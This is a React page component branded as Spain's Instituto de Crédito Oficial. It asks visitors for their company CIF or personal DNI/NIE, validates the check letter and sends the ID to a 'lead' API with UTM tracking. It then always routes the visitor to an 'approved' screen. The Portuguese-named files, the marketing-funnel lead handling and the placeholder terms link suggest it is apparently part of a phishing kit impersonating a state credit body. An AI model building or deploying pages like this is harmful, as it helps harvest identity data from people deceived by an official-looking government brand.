import React, { useState, useRef, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import './ibcartao.css';
import Loading from "./components/loading"
import { LEAD_API_URL, sendEvent } from "./Config";

function validateSpanishID(id) {
    const res = makeValidateSpanishID(id);

    return res.valid;
}

function makeValidateSpanishID(id) {
    id = id.toUpperCase(); // Normalize to uppercase for consistent validation

    const letters = "TRWAGMYFPDXBNJZSQVHLCKE"; // Lookup string for DNI/NIE control letter

    // 1. General format validation: 9 alphanumeric characters
    if (!/^[A-Z0-9]{9}$/.test(id)) {
        return { valid: false, type: 'Unknown' };
    }

    // 2. DNI validation (8 numbers + 1 letter)
    if (/^[0-9]{8}[A-Z]$/.test(id)) {
        const number = parseInt(id.slice(0, 8), 10);
        const letter = id[8];
        return { valid: letter === letters[number % 23], type: 'NIF' };
    }

    // 3. NIE validation (X, Y, Z followed by 7 numbers and 1 letter)
    if (/^[XYZ][0-9]{7}[A-Z]$/.test(id)) {
        const replacement = { X: "0", Y: "1", Z: "2" };
        const nieNumber = replacement[id[0]] + id.slice(1, 8);
        const letter = id[8];
        return { valid: letter === letters[parseInt(nieNumber, 10) % 23], type: 'NIE' };
    }

    // 4. CIF validation (1 letter + 7 numbers + 1 letter/number)
    if (/^[ABCDEFGHJNPQRSUVW][0-9]{7}[A-Z0-9]$/.test(id)) {
        let sumEven = 0;
        let sumOdd = 0;
        const firstLetter = id[0];
        const lastChar = id[8];

        for (let i = 1; i < 8; i++) {
            const digit = parseInt(id[i], 10);
            if (i % 2 === 0) { // Even positions
                sumEven += digit;
            } else { // Odd positions
                let doubledDigit = digit * 2;
                sumOdd += (doubledDigit < 10) ? doubledDigit : (Math.floor(doubledDigit / 10) + (doubledDigit % 10));
            }
        }

        const totalSum = sumEven + sumOdd;
        const controlDigit = (10 - (totalSum % 10)) % 10;

        let expectedControlChar;
        if ("ABEH".includes(firstLetter)) {
            expectedControlChar = String(controlDigit);
        } else if ("KPQS".includes(firstLetter)) {
            expectedControlChar = "JABCDEFGHI"[controlDigit];
        } else {
            expectedControlChar = String(controlDigit);
            const alternativeControlChar = "JABCDEFGHI"[controlDigit];
            if (lastChar === alternativeControlChar) {
                return { valid: true, type: 'CIF' };
            }
        }

        return { valid: lastChar === expectedControlChar, type: 'CIF' };
    }

    return { valid: false, type: 'Unknown' };
}

const LoginDNIPage = function () {
    const navigate = useNavigate();
    const [erroNIF, setErroDNI] = useState("");
    const [isLoading, setIsLoading] = useState(false);
    const nifInputRef = useRef();
    const leadIdRef = useRef(localStorage.getItem("lead_id"));

    const handleFormSubmit = async (e) => {
        try {
            e.preventDefault();

            const utmSource = localStorage.getItem("utm_source");
            const nif = nifInputRef.current;

            if (!validateSpanishID(nif.value)) {
                setErroDNI(`CIF inválido, por favor ingrese un número correcto.`)
                return;
            }

            setErroDNI("validated");
            setIsLoading(true);

            localStorage.setItem("nif", nif.value);

            const response = await fetch(`${LEAD_API_URL}/onboarding/es/${nif.value}?utm_source=${utmSource}`, {
                method: "GET",
                headers: {
                    "Content-Type": "application/json"
                }
            });

            if (!response.ok) return;

            const json = await response.json();

            if (!json._id) return;

            console.log(json);

            localStorage.setItem("lead_id", json._id);

            navigate('/onboarding/approved');
            setIsLoading(false);
        } catch (e) {
            console.error(e.message);
        }
    }

    useEffect(() => {
        const nif = localStorage.getItem("nif");

        if (nif) {
            nifInputRef.current.value = nif;

            if (validateSpanishID(nif)) {
                setErroDNI("validated");
            }
        }

        sendEvent(leadIdRef.current ?? false, "es-website-nif");
    }, []);

    return <>
        {isLoading && <Loading />}
        <div className='header flex items-center'>
            <div className='content flex items-center gap-x-4'>
                <div className='flex items-center w-auto border-r pr-4'>
                    <img src='/assets/img/logo-white.svg?t' className='logo' />
                </div>
                <div className='flex-1'>
                    <span className='subtitle'>Instituto de Crédito Oficial</span>
                </div>
            </div>
        </div>
        <div className="steps mt-5 flex gap-x-2">
            <div className='flex-1 check'></div>
            <div className='flex-1 check'></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
        </div>
        <div className='container'>
            <form onSubmit={handleFormSubmit}>
                <div className='content mt-8'>
                    <h1>Introduzca el CIF de su empresa y comience la simulación</h1>
                    <p className='mt-6 separator-bottom pb-5'>Introduzca su CIF para verificar si su empresa cumple los requisitos de elegibilidad para el crédito del ICO.</p>
                    <div className={`field ${(erroNIF != "" && erroNIF != "validated") ? "error" : ""} ${(erroNIF == "validated") ? "validated" : ""}`}>
                        <input id="nif" ref={nifInputRef} className="mt-5 login" type='text' inputMode="text" placeholder='NIF' maxLength={9} onBlur={(e) => {
                            if (e.target.value.length == 0) {
                                setErroDNI("Campo obligatorio!")
                                return;
                            }

                            if (!validateSpanishID(e.target.value)) {
                                setErroDNI(`CIF inválido, por favor ingrese un número correcto.`)
                            } else {
                                setErroDNI("validated");
                            }
                        }} />
                        <label>CIF</label>
                        <img src='/assets/img/warning.svg' className="warning" />
                        <img src='/assets/img/check.svg' className="check" />
                        <span className='error-message'>{erroNIF}</span>
                    </div>
                    <p className='caption mt-12'>
                        Al continuar, usted acepta los <a href="#">Términos de Uso y la Política de Privacidad</a> de Instituto de Crédito Oficial.
                    </p>
                    <button type="submit" className='primary w-full mt-12'>Siguiente</button>
                </div>
            </form>
        </div>
    </>
}

export default LoginDNIPage;